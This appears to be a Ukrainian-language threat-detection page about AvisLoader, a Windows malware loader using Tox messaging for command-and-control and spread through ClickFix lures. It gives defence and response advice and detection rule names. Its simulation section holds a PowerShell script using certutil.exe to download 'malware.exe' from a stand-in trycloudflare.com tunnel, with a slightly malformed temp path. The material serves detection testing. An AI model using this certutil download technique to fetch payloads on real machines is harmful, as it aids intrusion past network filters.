AvisLoader: новий стійкий завантажувач шкідливих програм для Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
AvisLoader – це нещодавно виявлений завантажувач шкідливого програмного забезпечення для Windows, який використовує мережу обміну повідомленнями Tox для командно-контрольної (C2) комунікації. Такий децентралізований підхід дозволяє операторам підтримувати підключення і переміщувати контролери без залежності від фіксованих доменів або централізованих серверів. Шкідливе програмне забезпечення зазвичай поширюється через соціальні інженерні приманки ClickFix, розміщені на інфраструктурі Cloudflare.
Розслідування
Varonis Threat Labs виявила завантажувач на відкритому сервері підготовки разом з його командним центром і пов’язаними інструментами. Розслідування виявило приманку ClickFix з темою DocuSign, яка інструктує користувачів виконувати команди, що отримують навантаження через Cloudflare Quick Tunnels. Аналіз виконуваного файлу виявив C2-комунікації на основі Tox, функціональність обходу UAC і модулі, призначені для приховування шкідливих процесів.
Захист
Організації повинні навчати користувачів розпізнавати та повідомляти про запити на підписування документів, які просять їх вставити команди в термінали або діалогове вікно Windows Run. Команди безпеки повинні стежити за підозрілим використанням Cloudflare Workers і Quick Tunnels в веб-приманках. Виявлення несподіваного трафіку peer-to-peer (P2P) мережі та несанкціонованих змін ярликів робочого столу також може допомогти знизити ризик.
Відповідь
Коли виявляється активність AvisLoader, команди безпеки повинні переглянути процес ланцюговості командних оболонок і інтерпретаторів сценаріїв, запущених після відвідування підозрілих доменів. Перевірте кінцеві точки на наявність змінених ярликів, .backup файли, і артефакт VLCAssistant . Телеметрія мережі також повинна бути перевірена на наявність незвичайного трафіку протоколу Tox, що походить з уражених хостів.
Атака
Ми ще оновлюємо цю частину.
Виявлення
Підозрілий виконуваний файл, що містить лише числа в назві (via cmdline)
Підозрілий зв’язок з доменом Trycloudflare (via dns)
Підозріла спроба виконання Curl [MacOS] (via cmdline)
IOCs (HashSha256) для виявлення: Знайомтеся з AvisLoader: завантажувач Windows, націлений на тривалу роботу після ліквідації
Виявлення несподіваного трафіку Tox або peer-to-peer [Windows Network Connection]
Виявлення віддаленого виконання коду за допомогою командних оболонок і Cloudflare Quick Tunnel [Windows Process Creation]
Виконання симуляції
-
Сценарій атаки та команди: Противник отримав первинний доступ до робочої станції. Щоб зберегти стійкість і завантажити їхній другий модульний вантаж, вони використовують Cloudflare Quick Tunnel, щоб обійти фільтрацію вихідного трафіку. Зловмисник використовує
certutil.exe, вбудовану утиліту Windows, щоб завантажити навантаження зhttps://malicious-tunnel-id.trycloudflare.com/payload.exe. Цей метод вибрано, оскількиcertutilє довіреним бінарним файлом, а трафік, здається, спрямований на легітимну інфраструктуру Cloudflare, що зменшує ймовірність його відхилення базовими фільтрами репутації мережі. -
Скрипт регресійного тестування:
# Скрипт симуляції для виклику правила виявлення. # Це використовує certutil для спроби завантаження із адреси trycloudflare.com. $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe" Write-Host "[*] Симуляція активності супротивника: Завантаження з $targetUrl через certutil..." # Наступна команда розроблена для виклику умов "selection_tunnel" І "selection_tools". certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe" if ($LASTEXITCODE -eq 0) { Write-Host "[+] Команда симуляції виконана успішно." } else { Write-Host "[-] Команда не вдалася (очікувано, якщо URL не існує, але телеметрія все ще повинна генеруватися)." } -
Команди очищення:
# Скрипт очищення для видалення симульованого навантаження та локальних артефактів. $tempFile = "$env:TEMPmalware.exe" if (Test-Path $tempFile) { Remove-Item -Path $tempFile -Force Write-Host "[+] Очищено $tempFile" } else { Write-Host "[-] Жодного артефакту не знайдено для очищення." }